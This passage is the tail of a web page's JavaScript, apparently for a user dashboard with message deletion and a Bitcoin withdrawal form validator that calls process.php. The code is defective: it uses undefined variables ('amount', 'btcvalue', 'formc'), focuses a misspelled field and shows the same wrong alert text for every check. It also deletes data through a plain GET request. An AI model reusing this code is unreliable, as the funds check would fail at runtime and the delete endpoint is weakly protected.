      xmlhttp.send();
    }
    function deletAllMsg(id) {
      var x = confirm("Are you sure you want to delete?");
      if (x) {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
          if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var respo = xmlhttp.responseText;
            if (respo == '1') {
              alert("All your messages has been deleted!");
              window.location.href = "index.php";
            } else {
              alert("Unable to delete all messages!");
            }

          }
        };
        xmlhttp.open("GET", "process.php?delet_Amsg=" + id, true);
        xmlhttp.send();
      } else {
        return false;
      }
    }
    function markAllNAsRead(id) {
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
          alert(xmlhttp.responseText);
        }
      };
      xmlhttp.open("GET", "process.php?msg_markNall=" + id, true);
      xmlhttp.send();
    }
    function adore() {
      if (document.cform.amount.value == '') {
        alert("Please type your amount or email!");
        document.cform.email.focus();
        return false;
      }
      if (document.cform.balance.value == '') {
        alert("Please type your amount or email!");
        document.cform.blance.focus();
        return false;
      }
      if (document.cform.amount_in_btc.value == '') {
        alert("Please type your amount or email!");
        document.cform.amount_in_btc.focus();
        return false;
      }

      if (document.cform.wallet_address.value == '') {
        alert("Please type your amount or email!");
        document.cform.wallet_address.focus();
        return false;
      }

      var x_amount = parseInt(document.cform.amount.value);
      var x_balance = parseInt(document.cform.balance.value);

      var checkam = (x_amount > x_balance);
      var z = amount * btcvalue;

      if (checkam == true) {

        formc.amount_in_btc.value = "Insufficient Fund";
        alert("Insufficient Fund");
      }


      return true;
    }
  </script>





</body>

</html>
